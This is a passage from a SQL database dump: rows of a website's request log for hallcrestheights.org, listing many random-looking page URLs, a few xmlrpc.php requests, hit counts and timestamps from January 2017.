00:00:00'),(2522,'http://www.hallcrestheights.org/jglet-k10984-kymd-rqzn-rvmlkswa-zvkecqqn-i20162637-eeiaqj-zlnpl.htm',NULL,'','',3,0,'2017-01-07 11:55:25','0000-00-00 00:00:00'),(2523,'http://www.hallcrestheights.org/cwhr-i20162629-k8405-iwgpekz-qdwkvum-zbsai/',NULL,'','',1,0,'2017-01-07 11:59:17','0000-00-00 00:00:00'),(2524,'http://www.hallcrestheights.org/i20162632-mrcqg-beif-uwgr-abtnwyrq-semgwkow-hmemxg-k48964-kucyb.htm',NULL,'','',1,0,'2017-01-07 12:01:38','0000-00-00 00:00:00'),(2525,'http://www.hallcrestheights.org/vqjnysp-vholjpeu-i20162630-k37688-rrtpiluo-urxivlb-trhnnm-tqzko.htm',NULL,'','',1,0,'2017-01-07 12:04:46','0000-00-00 00:00:00'),(2526,'http://www.hallcrestheights.org/soeg-i20162629-szxyife-tvtndyu-uhvfc-yzlsx-k18905-xqroxae/',NULL,'','',1,0,'2017-01-07 12:10:59','0000-00-00 00:00:00'),(2527,'http://www.hallcrestheights.org/i20162632-ryvhr-hmqt-k48064-yysl-lgeajanp-dmefnxhq-fhjdyh-aoxrc.htm',NULL,'','',1,0,'2017-01-07 12:20:20','0000-00-00 00:00:00'),(2528,'http://www.hallcrestheights.org/i20162632-vqjnyspv-holjp-k4720-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt.htm',NULL,'','',1,0,'2017-01-07 12:23:27','0000-00-00 00:00:00'),(2529,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-i20162628-japyvrl-flxh-qjkuh-k8140-kcmumb.htm',NULL,'','',2,0,'2017-01-07 12:29:41','0000-00-00 00:00:00'),(2530,'http://www.hallcrestheights.org/qlbo-i20162629-wciggec-eayafxr-glnik-ghhmb-k37805-bxpgesm/',NULL,'','',4,0,'2017-01-07 12:32:49','0000-00-00 00:00:00'),(2531,'http://www.hallcrestheights.org/i20162632-upttmnbe-atgrb-nqcdcncx-rdhcpgz-zdll-imvyx-k5620-jltfeo.htm',NULL,'','',1,0,'2017-01-07 12:35:55','0000-00-00 00:00:00'),(2532,'http://www.hallcrestheights.org/i20162634-qlbow-ciggec-eayaf-xrgl-nikghhm-k32657-bbxpgesm/',NULL,'','',1,0,'2017-01-07 12:39:05','0000-00-00 00:00:00'),(2533,'http://www.hallcrestheights.org/i20162632-k26320-pcscqruf-unpkw-xpoideot-wtvsoar-mosm-gepla-lheliy.htm',NULL,'','',1,0,'2017-01-07 12:42:10','0000-00-00 00:00:00'),(2534,'http://www.hallcrestheights.org/upttmnbe-k57100-atgrb-i20162634-nqcdcncx-rdhcpgz-zdll-imvyx-jltfeo.htm',NULL,'','',1,0,'2017-01-07 12:48:23','0000-00-00 00:00:00'),(2535,'http://www.hallcrestheights.org/kzpf-i20162629-fmsxklr-dedhwge-fvbbg-zagpe-k59045-ciyyuwu/',NULL,'','',3,0,'2017-01-07 12:51:31','0000-00-00 00:00:00'),(2536,'http://www.hallcrestheights.org/k36400-fadlajfn-lgfpc-vwgmyhde-i20162635-cwxbdeu-dkov-fiibp-tquhzx.htm',NULL,'','',1,0,'2017-01-07 12:57:44','0000-00-00 00:00:00'),(2537,'http://www.hallcrestheights.org/i20162632-edzvdlqc-omnnm-mcawvbfu-japyvrl-flxh-k47920-qjkuh-kcmumb.htm',NULL,'','',2,0,'2017-01-07 13:03:59','0000-00-00 00:00:00'),(2538,'http://www.hallcrestheights.org/cwhr-i20162629-iwgpekz-qdwkvum-zbsai-imjzf-k39605-ozgdvdd/',NULL,'','',1,0,'2017-01-07 13:07:05','0000-00-00 00:00:00'),(2539,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg-eyooayi-i20162636-kuks-k36580-szqce-baqdom.htm',NULL,'','',1,0,'2017-01-07 13:10:13','0000-00-00 00:00:00'),(2540,'http://www.hallcrestheights.org/i20162632-dvisciwb-vwkux-krbzomsm-vuclzup-k46120-hvqa-wuoxz-mnpzvs.htm',NULL,'','',1,0,'2017-01-07 13:13:19','0000-00-00 00:00:00'),(2541,'http://www.hallcrestheights.org/jgletkym-drqzn-rvmlkswa-i20162635-k16600-zvkecqq-neei-aqjzl-nplqfc.htm',NULL,'','',1,0,'2017-01-07 13:22:41','0000-00-00 00:00:00'),(2542,'http://www.hallcrestheights.org/i20162634-bsoap-azapst-asgmh-cqcm-ckfrdtf-k53357-kgpvbchs/',NULL,'','',1,0,'2017-01-07 13:25:48','0000-00-00 00:00:00'),(2543,'http://www.hallcrestheights.org/htxw-i20162629-hykrsvs-vhudykb-qxdos-fiety-k36905-uaixnrb/',NULL,'','',2,0,'2017-01-07 13:28:55','0000-00-00 00:00:00'),(2544,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm-i20162635-vuclzup-hvqa-wuoxz-k15700-mnpzvs.htm',NULL,'','',1,0,'2017-01-07 13:32:10','0000-00-00 00:00:00'),(2545,'http://www.hallcrestheights.org/i20162632-jgletkym-k47020-drqzn-rvmlkswa-zvkecqq-neei-aqjzl-nplqfc.htm',NULL,'','',1,0,'2017-01-07 13:35:15','0000-00-00 00:00:00'),(2546,'http://www.hallcrestheights.org/ixnmu-k10684-eahw-hioz-hjxbnwpg-eyooayik-i20162633-uksszq-cebaq-domytn-iholb.htm',NULL,'','',1,0,'2017-01-07 13:41:23','0000-00-00 00:00:00'),(2547,'http://www.hallcrestheights.org/upttm-k12484-nbea-tgrb-nqcdcncx-rdhcpgzz-i20162633-dllimv-yxjlt-feobke-bwivs.htm',NULL,'','',1,0,'2017-01-07 13:47:38','0000-00-00 00:00:00'),(2548,'http://www.hallcrestheights.org/k43632-uptt-mnbeatg-rbnqc-dcncxr-dhcpgzz-dllimvyx-i20162630-jltfeob-kebwivsm.htm',NULL,'','',1,0,'2017-01-07 13:50:44','0000-00-00 00:00:00'),(2549,'http://www.hallcrestheights.org/jglet-k53884-kymd-rqzn-rvmlkswa-i20162632-zvkecqqn-eeiaqj-zlnpl-qfcneb-xilnv.htm',NULL,'','',1,0,'2017-01-07 13:57:02','0000-00-00 00:00:00'),(2550,'http://www.hallcrestheights.org/fadl-ajfnlgf-pcvwg-myhdec-k22932-wxbdeud-kovfiibp-i20162630-tquhzxc-hhrmxagf.htm',NULL,'','',1,0,'2017-01-07 14:03:15','0000-00-00 00:00:00'),(2551,'http://www.hallcrestheights.org/i20162634-oiyiz-golrcm-wfbsn-opdg-fnhskrl-k54257-jrgfctfz/',NULL,'','',1,0,'2017-01-07 14:12:33','0000-00-00 00:00:00'),(2552,'http://www.hallcrestheights.org/fadlajf-i20162633-nlgfpcvw-gmyhdecw-xbdeudk-k9828-ovfiib-ptquh-zxchhrmx-agfp.htm',NULL,'','',1,0,'2017-01-07 14:15:40','0000-00-00 00:00:00'),(2553,'http://www.hallcrestheights.org/mrcqg-k52084-beif-uwgr-abtnwyrq-semgwkow-hmemxg-kucyb-npzkic-i20162636-vejxk.htm',NULL,'','',1,0,'2017-01-07 14:19:03','0000-00-00 00:00:00'),(2554,'http://www.hallcrestheights.org/soegszxy-ifet-vtndyuu-hvfcyzls-xxqroxae-i20162633-k8141-hksk/',NULL,'','',1,0,'2017-01-07 14:31:14','0000-00-00 00:00:00'),(2555,'http://www.hallcrestheights.org/qlbowcig-gece-i20162630-ayafxrg-lnikghhm-bbxpgesm-k48101-rcai/',NULL,'','',3,0,'2017-01-07 14:34:29','0000-00-00 00:00:00'),(2556,'http://www.hallcrestheights.org/i20162634-nfrkopdo-bbum-golzesr-kwtzqtqb-svjcwjbx-k34781-nmyv/',NULL,'','',3,0,'2017-01-07 14:47:17','0000-00-00 00:00:00'),(2557,'http://www.hallcrestheights.org/k47592-jgle-tkymdrq-znrvm-lkswaz-i20162628-vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo.htm',NULL,'','',1,0,'2017-01-07 14:49:57','0000-00-00 00:00:00'),(2558,'http://www.hallcrestheights.org/pcscq-k33184-rufu-npkw-xpoideot-i20162632-wtvsoarm-osmgep-lalhe-liyrqi-yqfuf.htm',NULL,'','',1,0,'2017-01-07 14:53:04','0000-00-00 00:00:00'),(2559,'http://www.hallcrestheights.org/ixnm-ueahwhi-i20162634-ozhjx-bnwpge-k11412-yooayik-uksszqce-baqdomy-tniholbd.htm',NULL,'','',1,0,'2017-01-07 15:01:48','0000-00-00 00:00:00'),(2560,'http://www.hallcrestheights.org/i20162637-ixnmu-k10684-eahw-hioz-hjxbnwpg-eyooayik-uksszq-cebaq-domytn-iholb.htm',NULL,'','',1,0,'2017-01-07 15:05:31','0000-00-00 00:00:00'),(2561,'http://www.hallcrestheights.org/vqjny-k11584-spvh-oljp-eurrtpil-uourxivl-i20162633-btrhnn-mtqzk-owtsxp-pbgrr.htm',NULL,'','',1,0,'2017-01-07 15:16:44','0000-00-00 00:00:00'),(2562,'http://www.hallcrestheights.org/upttm-k42904-nbea-tgrb-nqcdcncx-rdhcpgzz-dllimv-yxjlt-feobke-i20162636-bwivs.htm',NULL,'','',1,0,'2017-01-07 15:21:07','0000-00-00 00:00:00'),(2563,'http://www.hallcrestheights.org/jgle-tkymdrq-i20162634-znrvm-lkswaz-k31212-vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo.htm',NULL,'','',1,0,'2017-01-07 15:27:23','0000-00-00 00:00:00'),(2564,'http://www.hallcrestheights.org/k38088-ixnmuea-hwhiozhj-xbnwpgey-ooayiku-ksszqc-ebaqd-i20162630-omytniho-lbde.htm',NULL,'','',1,0,'2017-01-07 15:33:37','0000-00-00 00:00:00'),(2565,'http://www.hallcrestheights.org/cwhriwg-pekzq-dwkvum-zbsaii-mjzfo-zgdv-i20162631-k7573-ddqjvd/',NULL,'','',1,0,'2017-01-07 15:39:49','0000-00-00 00:00:00'),(2566,'http://www.hallcrestheights.org/mrcqgbe-i20162633-ifuwgrab-tnwyrqse-mgwkowh-k11628-memxgk-ucybn-pzkicvej-xkul.htm',NULL,'','',1,0,'2017-01-07 15:52:28','0000-00-00 00:00:00'),(2567,'http://www.hallcrestheights.org/edzvdlq-comnnmmc-awvbfuja-pyvrlfl-k58788-xhqjku-hkcmu-i20162630-mbhmgznk-ohey.htm',NULL,'','',1,0,'2017-01-07 15:55:28','0000-00-00 00:00:00'),(2568,'http://www.hallcrestheights.org/qlbowci-ggece-ayafxr-glnikg-hhmbb-k5773-xpge-i20162631-smrcai/',NULL,'','',1,0,'2017-01-07 16:09:59','0000-00-00 00:00:00'),(2569,'http://www.hallcrestheights.org/i20162632-k32328-zmkuedt-zjivyoqx-ifgxuhxp-tvuhmiw-nzkorp-vubfg-nqtpmhpr-bikz.htm',NULL,'','',1,0,'2017-01-07 16:11:29','0000-00-00 00:00:00'),(2570,'http://www.hallcrestheights.org/i20162632-k52128-ixnmuea-hwhiozhj-xbnwpgey-ooayiku-ksszqc-ebaqd-omytniho-lbde.htm',NULL,'','',1,0,'2017-01-07 16:34:47','0000-00-00 00:00:00'),(2571,'http://www.hallcrestheights.org/yembjvht-qqdc-kzfltzt-i20162631-erqbwnsw-nsnjplpf-k62501-trrj/',NULL,'','',3,0,'2017-01-07 16:38:08','0000-00-00 00:00:00'),(2572,'http://www.hallcrestheights.org/i20162632-lugdltr-smxxhypz-qjllzohn-jumntec-k31428-wfogyw-biwyr-urfgvfcw-qzhr.htm',NULL,'','',1,0,'2017-01-07 16:55:01','0000-00-00 00:00:00'),(2573,'http://www.hallcrestheights.org/zmkuedt-zjivyoqx-i20162634-ifgxuhxp-tvuhmiw-k25308-nzkorp-vubfg-nqtpmhpr-bikz.htm',NULL,'','',1,0,'2017-01-07 16:58:31','0000-00-00 00:00:00'),(2574,'http://www.hallcrestheights.org/i20162634-yembjvht-qqdc-kzfltzt-erqbwnsw-nsnjplpf-k55481-trrj/',NULL,'','',3,0,'2017-01-07 17:03:12','0000-00-00 00:00:00'),(2575,'http://www.hallcrestheights.org/i20162637-lugdlt-k33976-rsmxxh-ypzqjl-lzoh-njumnt-ecwfog-ywbiw-yrurfgv-fcwqzhr.htm',NULL,'','',1,0,'2017-01-07 17:05:49','0000-00-00 00:00:00'),(2576,'http://www.hallcrestheights.org/cwhriwgp-ekzq-dwkvumz-bsaiimjz-fozgdvdd-i20162633-k28841-qjvd/',NULL,'','',1,0,'2017-01-07 17:23:39','0000-00-00 00:00:00'),(2577,'http://www.hallcrestheights.org/mrcqgb-k51616-eifuwg-rabtnw-yrqs-emgwko-whmemx-i20162634-gkucy-bnpzkic-vejxkul.htm',NULL,'','',1,0,'2017-01-07 17:28:47','0000-00-00 00:00:00'),(2578,'http://www.hallcrestheights.org/ixnmue-k10216-ahwhio-zhjxbn-wpge-yooayi-kukssz-qceba-i20162635-qdomytn-iholbde.htm',NULL,'','',1,0,'2017-01-07 17:38:19','0000-00-00 00:00:00'),(2579,'http://www.hallcrestheights.org/fadlajfn-k4420-lgfpc-vwgmyhde-cwxbdeu-i20162632-dkov-fiibp-tquhzx-chhr-mxagfpap.htm',NULL,'','',1,0,'2017-01-07 17:45:20','0000-00-00 00:00:00'),(2580,'http://www.hallcrestheights.org/ryvhrhmq-k5320-tyysl-lgeajanp-dmefnxh-i20162632-qfhj-dyhao-xrcjhw-uvds-vezytwlc.htm',NULL,'','',1,0,'2017-01-07 17:48:44','0000-00-00 00:00:00'),(2581,'http://www.hallcrestheights.org/tkuykfj-dnjjb-k6673-ucyupa-jaylrl-wfvdy-ruqp-i20162631-klsdef/',NULL,'','',1,0,'2017-01-07 17:59:10','0000-00-00 00:00:00'),(2582,'http://www.hallcrestheights.org/tkuykfjd-njjb-i20162630-ucyupaj-aylrlwfv-dyruqpkl-k49001-sdef/',NULL,'','',4,0,'2017-01-07 18:10:41','0000-00-00 00:00:00'),(2583,'http://www.hallcrestheights.org/i20162628-upttmnbe-k8740-atgrb-nqcdcncx-rdhcpgz-zdll-imvyx-jltfeo-bkeb-wivsmqkr.htm',NULL,'','',1,0,'2017-01-07 18:14:22','0000-00-00 00:00:00'),(2584,'http://www.hallcrestheights.org/i20162628-lugdltrs-k9640-mxxhy-pzqjllzo-hnjumnt-ecwf-ogywb-iwyrur-fgvf-cwqzhrib.htm',NULL,'','',1,0,'2017-01-07 18:20:45','0000-00-00 00:00:00'),(2585,'http://www.hallcrestheights.org/i20162628-ixnmueah-k30340-whioz-hjxbnwpg-eyooayi-kuks-szqce-baqdom-ytni-holbdent.htm',NULL,'','',1,0,'2017-01-07 18:24:09','0000-00-00 00:00:00'),(2586,'http://www.hallcrestheights.org/cwhr-iwgpekz-qdwkvum-k18805-zbsai-i20162629-imjzf-ozgdvdd-qjvd/',NULL,'','',1,0,'2017-01-07 18:27:49','0000-00-00 00:00:00'),(2587,'http://www.hallcrestheights.org/lugdltrs-k26020-mxxhy-pzqjllzo-hnjumnt-i20162632-ecwf-ogywb-iwyrur-fgvf-cwqzhrib.htm',NULL,'','',1,0,'2017-01-07 18:31:21','0000-00-00 00:00:00'),(2588,'http://www.hallcrestheights.org/i20162637-edzvdlqc-k51040-omnnm-mcawvbfu-japyvrl-flxh-qjkuh-kcmumb-hmgz-nkoheyru.htm',NULL,'','',1,0,'2017-01-07 18:35:06','0000-00-00 00:00:00'),(2589,'http://www.hallcrestheights.org/k34573-nfrkopd-obbum-golzes-rkwtzq-tqbsv-i20162630-jcwj-bxnmyv/',NULL,'','',1,0,'2017-01-07 18:42:01','0000-00-00 00:00:00'),(2590,'http://www.hallcrestheights.org/i20162628-gnfznxvj-k28540-xpalt-itjshkyj-yldpija-amdu-rtaen-pggwtd-vlxt-dqkunfgl.htm',NULL,'','',2,0,'2017-01-07 18:52:49','0000-00-00 00:00:00'),(2591,'http://www.hallcrestheights.org/i20162637-jgletkym-k50140-drqzn-rvmlkswa-zvkecqq-neei-aqjzl-nplqfc-nebx-ilnvoxbd.htm',NULL,'','',1,0,'2017-01-07 18:56:25','0000-00-00 00:00:00'),(2592,'http://www.hallcrestheights.org/k16800-upttmnbe-atgrb-nqcdcncx-rdhcpgz-zdll-i20162635-imvyx-jltfeo-bkeb-wivsmqkr-fbmlkmst.htm',NULL,'','',1,0,'2017-01-07 19:03:26','0000-00-00 00:00:00'),(2593,'http://www.hallcrestheights.org/nfrko-pdobbu-mgolz-esrk/wtzqtqb-i20162635-svjcwjbx-nmyvsssl-k24927-djznaah-jbkwxros-holvg/',NULL,'','',1,0,'2017-01-07 19:07:49','0000-00-00 00:00:00'),(2594,'http://www.hallcrestheights.org/k25249-soegsz-xyifetvt-ndyu-uhvfc-i20162629-yzls-xxqroxa-ehkskxy/',NULL,'','',4,0,'2017-01-07 19:14:08','0000-00-00 00:00:00'),(2595,'http://www.hallcrestheights.org/k26520-fadlajfn-lgfpc-i20162632-vwgmyhde-cwxbdeu-dkov-fiibp-tquhzx-chhr-mxagfpap-uhgfqvjd.htm',NULL,'','',1,0,'2017-01-07 19:21:14','0000-00-00 00:00:00'),(2596,'http://www.hallcrestheights.org/k15900-vqjnyspv-holjp-eurrtpil-uourxiv-lbtr-i20162635-hnnmt-qzkowt-sxpp-bgrrcdsi-kibkxnpf.htm',NULL,'','',1,0,'2017-01-07 19:24:50','0000-00-00 00:00:00'),(2597,'http://www.hallcrestheights.org/k57300-dvisciwb-vwkux-krbzomsm-vuclzup-i20162634-hvqa-wuoxz-mnpzvs-gcrl-ycmczoqq-eludpwcm.htm',NULL,'','',2,0,'2017-01-07 19:32:03','0000-00-00 00:00:00'),(2598,'http://www.hallcrestheights.org/i20162630-vqjnysp-vholjpeu-rrtpiluo-urxivlb-trhnnm-tqzko-wtsxppbg-rrcd-k58488-sikibk-xnpf.htm',NULL,'','',2,0,'2017-01-07 19:35:31','0000-00-00 00:00:00'),(2599,'http://www.hallcrestheights.org/fadlajf-nlgfpcvw-i20162632-gmyhdecw-xbdeudk-ovfiib-ptquh-zxchhrmx-agfp-k52728-apuhgf-qvjd.htm',NULL,'','',1,0,'2017-01-07 19:39:09','0000-00-00 00:00:00'),(2600,'http://www.hallcrestheights.org/i20162632-tkuykf-jdnjjbuc-k59089-yupa-jaylr-lwfv-dyruqpk-lsdefhx/',NULL,'','',1,0,'2017-01-07 19:42:39','0000-00-00 00:00:00'),(2601,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj-ikvf-i20162635-vtzpx-k38749-bxkc-wjybtyl-wosduie/',NULL,'','',2,0,'2017-01-07 19:46:13','0000-00-00 00:00:00'),(2602,'http://www.hallcrestheights.org/k35880-fadlajfn-lgfpc-vwgmyhde-cwxbdeu-dkov-fiibp-i20162636-tquhzx-chhr-mxagfpap-uhgfqvjd.htm',NULL,'','',1,0,'2017-01-07 19:49:46','0000-00-00 00:00:00'),(2603,'http://www.hallcrestheights.org/k37500-pcscqruf-unpkw-xpoideot-wtvsoar-mosm-i20162635-gepla-lheliy-rqiy-qfufxvug-owopegtq.htm',NULL,'','',1,0,'2017-01-07 19:56:54','0000-00-00 00:00:00'),(2604,'http://www.hallcrestheights.org/i20162632-cwhriw-gpekzqdw-kvum-zbsai-imjz-fozgdvd-k59989-dqjvdob/',NULL,'','',3,0,'2017-01-07 20:00:29','0000-00-00 00:00:00'),(2605,'http://www.hallcrestheights.org/i20162628-gnfz-nxvjxpa-k26642-ltitj-shkyjy/ldpijaa-mdurtaen-pggwtdv-lxtdqkun-fglq-rhzyonxf-eqnzsvvb-pzwdhkv.htm',NULL,'','',1,0,'2017-01-07 20:03:07','0000-00-00 00:00:00'),(2606,'http://www.hallcrestheights.org/soeg-szxyife-tvtndyu-uhvfc/yzlsx-k59595-xqroxae-hksk-xyxembuq-udtwq-i20162629-ceyvuc/',NULL,'','',1,0,'2017-01-07 20:03:22','0000-00-00 00:00:00'),(2607,'http://www.hallcrestheights.org/i20162628-zmku-edtzjiv/k47642-yoqxi-fgxuhx-ptvuhmi-wnzkorpv.htm',NULL,'','',1,0,'2017-01-07 20:03:50','0000-00-00 00:00:00'),(2608,'http://www.hallcrestheights.org/yembjv-htqqdckz-fltz-i20162628-terqb-wnsw-k46849-nsnjplp-ftrrjnc/',NULL,'','',1,0,'2017-01-07 20:07:50','0000-00-00 00:00:00'),(2609,'http://hallcrestheights.org/blog/xmlrpc.php',NULL,'','',4,0,'2017-01-07 20:16:06','0000-00-00 00:00:00'),(2610,'http://hallcrestheights.org/xmlrpc.php',NULL,'','',87,0,'2017-01-07 20:16:12','0000-00-00 00:00:00'),(2611,'http://www.hallcrestheights.org/k47220-upttmnbe-atgrb-i20162632-nqcdcncx-rdhcpgz-zdll-imvyx-jltfeo-bkeb-wivsmqkr-fbmlkmst.htm',NULL,'','',1,0,'2017-01-07 20:29:04','0000-00-00 00:00:00'),(2612,'http://www.hallcrestheights.org/k29940-vqjnyspv-holjp-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt-sxpp-i20162628-bgrrcdsi-kibkxnpf.htm',NULL,'','',1,0,'2017-01-07 20:39:42','0000-00-00 00:00:00'),(2613,'http://www.hallcrestheights.org/k17689-wbwpbo-i20162633-nkydhxjj-ikvf-vtzpx-bxkc-wjybtyl-wosduie/',NULL,'','',1,0,'2017-01-07 20:43:19','0000-00-00 00:00:00'),(2614,'http://www.hallcrestheights.org/gnfznxv-jxpaltit-jshkyjyl-i20162633-dpijaam-durtae-npggw-tdvlxtdq-kunf-k11328-glqrhz-yonx.htm',NULL,'','',1,0,'2017-01-07 20:57:38','0000-00-00 00:00:00'),(2615,'http://www.hallcrestheights.org/k39120-ryvhrhmq-i20162631-tyysl-lgeajanp-dmefnxh-qfhj-dyhao-xrcjhw-uvds-vezytwlc-ycwscpua.htm',NULL,'','',1,0,'2017-01-07 21:01:12','0000-00-00 00:00:00'),(2616,'http://www.hallcrestheights.org/k51540-pcscqruf-unpkw-xpoideot-wtvsoar-mosm-gepla-lheliy-i20162637-rqiy-qfufxvug-owopegtq.htm',NULL,'','',1,0,'2017-01-07 21:04:41','0000-00-00 00:00:00'),(2617,'http://www.hallcrestheights.org/k46320-vqjnyspv-holjp-i20162632-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt-sxpp-bgrrcdsi-kibkxnpf.htm',NULL,'','',1,0,'2017-01-07 21:11:59','0000-00-00 00:00:00'),(2618,'http://www.hallcrestheights.org/k25620-zmkuedtz-jivyo-i20162632-qxifgxuh-xptvuhm-iwnz-korpv-ubfgnq-tpmh-prbikzon-mtlajhol.htm',NULL,'','',1,0,'2017-01-07 21:15:21','0000-00-00 00:00:00'),(2619,'http://www.hallcrestheights.org/kzpffm-i20162633-sxklrded-hwge-fvbbg-k18589-zagp-eciyyuw-uvfztji/',NULL,'','',1,0,'2017-01-07 21:22:30','0000-00-00 00:00:00'),(2620,'http://www.hallcrestheights.org/ajqx-xucuzao-fifephi-ijimj/njbog-k58695-tsakbcc-gyfm-dvjuxzle-ktsls-i20162629-hxosqq/',NULL,'','',1,0,'2017-01-07 21:23:29','0000-00-00 00:00:00'),(2621,'http://www.hallcrestheights.org/k27192-dvis-ciwbvwk-i20162628-uxkrb-zomsmv-uclzuph-vqawuoxz-mnpzvsg-crlycmcz-oqqe-ludpwcme-giapxmxi.htm',NULL,'','',1,0,'2017-01-07 21:23:56','0000-00-00 00:00:00'),(2622,'http://www.hallcrestheights.org/mrcqgbe-ifuwgrab-i20162632-tnwyrqse-mgwkowh-memxgk-ucybn-pzkicvej-xkul-k31128-zjcjkn-tsxj.htm',NULL,'','',1,0,'2017-01-07 21:29:49','0000-00-00 00:00:00'),(2623,'http://www.hallcrestheights.org/k50640-gnfznxvj-xpalt-itjshkyj-yldpija-amdu-rtaen-pggwtd-i20162637-vlxt-dqkunfgl-qrhzyonx.htm',NULL,'','',2,0,'2017-01-07 21:36:55','0000-00-00 00:00:00'),(2624,'http://www.hallcrestheights.org/dvisciw-bvwkuxkr-i20162632-bzomsmvu-clzuphv-qawuox-zmnpz-vsgcrlyc-mczo-k32028-qqelud-pwcm.htm',NULL,'','',1,0,'2017-01-07 21:40:37','0000-00-00 00:00:00'),(2625,'http://www.hallcrestheights.org/cwhriwgp-i20162633-ekzq-dwkvumz-bsaiimjz-fozgdvdd-k8041-qjvd-obkn/',NULL,'','',1,0,'2017-01-07 21:47:29','0000-00-00 00:00:00'),(2626,'http://www.hallcrestheights.org/k40920-dvisciwb-i20162631-vwkux-krbzomsm-vuclzup-hvqa-wuoxz-mnpzvs-gcrl-ycmczoqq-eludpwcm.htm',NULL,'','',1,0,'2017-01-07 21:51:02','0000-00-00 00:00:00'),(2627,'http://www.hallcrestheights.org/i20162630-zmkuedt-zjivyoqx-ifgxuhxp-tvuhmiw-nzkorp-vubfg-nqtpmhpr-bikz-k37788-onmtla-jhol.htm',NULL,'','',1,0,'2017-01-07 21:54:35','0000-00-00 00:00:00'),(2628,'http://www.hallcrestheights.org/k29040-ixnmueah-whioz-hjxbnwpg-eyooayi-kuks-szqce-baqdom-ytni-i20162628-holbdent-afymluze.htm',NULL,'','',1,0,'2017-01-07 21:58:10','0000-00-00 00:00:00'),(2629,'http://www.hallcrestheights.org/k40020-mrcqgbei-i20162631-fuwgr-abtnwyrq-semgwko-whme-mxgku-cybnpz-kicv-ejxkulzj-cjkntsxj.htm',NULL,'','',1,0,'2017-01-07 22:01:54','0000-00-00 00:00:00'),(2630,'http://www.hallcrestheights.org/zmkuedt-zjivyoqx-i20162632-ifgxuhxp-tvuhmiw-nzkorp-vubfg-nqtpmhpr-bikz-k51828-onmtla-jhol.htm',NULL,'','',1,0,'2017-01-07 22:05:23','0000-00-00 00:00:00'),(2631,'http://www.hallcrestheights.org/i20162628-ixnm-ueahwhi/k47942-ozhjx-bnwpge.htm',NULL,'','',1,0,'2017-01-07 22:05:46','0000-00-00 00:00:00'),(2632,'http://www.hallcrestheights.org/soeg-szxyife-tvtndyu/uhvfc-yzlsx-xqroxae-i20162630-hksk-k16695-xyxembuq/',NULL,'','',1,0,'2017-01-07 22:05:55','0000-00-00 00:00:00'),(2633,'http://www.hallcrestheights.org/dvisciw-bvwkuxkr-bzomsmvu-clzuphv-i20162634-qawuox-zmnpz-vsgcrlyc-mczo-k25008-qqelud-pwcm.htm',NULL,'','',1,0,'2017-01-07 22:09:30','0000-00-00 00:00:00'),(2634,'http://www.hallcrestheights.org/zmku-edtzjiv-k27492-yoqxi-fgxuhx-ptvuhmi-wnzkorpv-ubfgnqt-pmhprbik-i20162628-zonm-tlajholj.htm',NULL,'','',1,0,'2017-01-07 22:12:26','0000-00-00 00:00:00'),(2635,'http://www.hallcrestheights.org/zmku-edtzjiv-k11112-yoqxi-fgxuhx-i20162634-ptvuhmi-wnzkorpv-ubfgnqt-pmhprbik-zonm-tlajholj.htm',NULL,'','',1,0,'2017-01-07 22:16:01','0000-00-00 00:00:00'),(2636,'http://www.hallcrestheights.org/wbwpb-k53257-onkydh-i20162634-xjjik-vfvt-zpxbxkc-wjybtylw-osduieqg/',NULL,'','',2,0,'2017-01-07 22:19:39','0000-00-00 00:00:00'),(2637,'http://www.hallcrestheights.org/k32557-bsoap-azapst-i20162634-asgmh-cqcm-ckfrdtf-kgpvbchs-iwhorklv/',NULL,'','',1,0,'2017-01-07 22:24:13','0000-00-00 00:00:00'),(2638,'http://www.hallcrestheights.org/lugd-ltrsmxx-k26592-hypzq-jllzoh-njumnte-cwfogywb-iwyrurf-gvfcwqzh-i20162628-ribn-knyfeebs.htm',NULL,'','',1,0,'2017-01-07 22:27:51','0000-00-00 00:00:00'),(2639,'http://www.hallcrestheights.org/oiyiz-golrcm-i20162634-wfbsn-opdg-k33457-fnhskrl-jrgfctfz-fiwxwmak/',NULL,'','',1,0,'2017-01-07 22:30:17','0000-00-00 00:00:00'),(2640,'http://www.hallcrestheights.org/i20162630-mrcq-gbeifuw-k44232-grabt-nwyrqs-emgwkow-hmemxgku-cybnpzk-icvejxku-lzjc-jkntsxjl.htm',NULL,'','',1,0,'2017-01-07 22:33:54','0000-00-00 00:00:00'),(2641,'http://www.hallcrestheights.org/wbwpbon-kydhx-jjikvf-vtzpxb/i20162630-xkcwj-ybty-lwosdu-k55623-ieqgws-ogxhgpi-sdhtn-irmjh/',NULL,'','',1,0,'2017-01-07 22:37:16','0000-00-00 00:00:00'),(2642,'http://www.hallcrestheights.org/vqjn-yspvhol-k48192-jpeur-rtpilu-ourxivl-btrhnnmt-qzkowts-xppbgrrc-i20162628-dsik-ibkxnpfo.htm',NULL,'','',1,0,'2017-01-07 22:37:26','0000-00-00 00:00:00'),(2643,'http://www.hallcrestheights.org/wbwp-k16545-bonkydh-xjjikvf-vtzpx-i20162630-bxkcw-jybtylw-osdu-ieqgwsog-xhgpi-sdhtni-rmjhv/',NULL,'','',1,0,'2017-01-07 22:37:41','0000-00-00 00:00:00'),(2644,'http://www.hallcrestheights.org/soegsz-k29539-xyifetvt-ndyu-uhvfc/i20162632-yzls-xxqroxa-ehkskxy-xembu-qudtwq/',NULL,'','',1,0,'2017-01-07 22:38:07','0000-00-00 00:00:00'),(2645,'http://www.hallcrestheights.org/wbwpbon-kydhx-i20162630-jjikvf-vtzpxb/xkcwj-ybty-lwosdu-ieqgws-ogxhgpi-sdhtn-irmjh-k34823-vzyxodbx/',NULL,'','',1,0,'2017-01-07 22:38:58','0000-00-00 00:00:00'),(2646,'http://www.hallcrestheights.org/soegszx-k35623-yifet-i20162630-vtndyu-uhvfcy/zlsxx-qrox-aehksk-xyxemb-uqudtwq/',NULL,'','',1,0,'2017-01-07 22:39:23','0000-00-00 00:00:00'),(2647,'http://www.hallcrestheights.org/ryvhrhm-qtyysllg-eajanpdm-efnxhqf-i20162632-hjdyha-oxrcj-hwuvdsve-zytw-k52328-lcycws-cpua-kqnj-tnply.htm',NULL,'','',1,0,'2017-01-07 22:40:41','0000-00-00 